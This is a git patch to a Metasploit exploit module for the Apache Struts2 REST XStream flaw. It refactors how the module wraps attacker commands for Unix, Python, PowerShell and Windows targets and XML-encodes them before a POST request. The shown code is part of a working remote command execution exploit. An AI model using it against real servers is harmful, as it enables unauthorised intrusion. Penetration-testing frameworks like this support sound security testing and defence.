From a9a307540f69486628207c73fb15938a4b634d55 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Thu, 7 Sep 2017 19:08:37 -0500
Subject: [PATCH] Assign cmd to entire case and use encode for XML

Hat tip @acammack-r7. Forgot about that first syntax!
---
 .../exploits/multi/http/struts2_rest_xstream.rb  | 16 +++++++---------
 1 file changed, 7 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/multi/http/struts2_rest_xstream.rb b/modules/exploits/multi/http/struts2_rest_xstream.rb
index 7aa97d63bf..fe010a4d21 100644
--- a/modules/exploits/multi/http/struts2_rest_xstream.rb
+++ b/modules/exploits/multi/http/struts2_rest_xstream.rb
@@ -86,21 +86,19 @@ class MetasploitModule < Msf::Exploit::Remote
   #
 
   def execute_command(cmd, opts = {})
-    case target.name
+    cmd = case target.name
     when /Unix/, /Linux/
-      cmd = %W{/bin/sh -c #{cmd}}
+      %W{/bin/sh -c #{cmd}}
     when /Python/
-      cmd = %W{python -c #{cmd}}
+      %W{python -c #{cmd}}
     when /PowerShell/
-      # This shit doesn't work yet
-      require 'pry'; binding.pry
-      cmd = %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
+      %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
     when /Windows/
-      cmd = %W{cmd.exe /c #{cmd}}
+      %W{cmd.exe /c #{cmd}}
     end
 
-    # Encode each command argument with HTML entities
-    cmd.map! { |arg| Rex::Text.html_encode(arg) }
+    # Encode each command argument with XML entities
+    cmd.map! { |arg| arg.encode(xml: :text) }
 
     res = send_request_cgi(
       'method' => 'POST',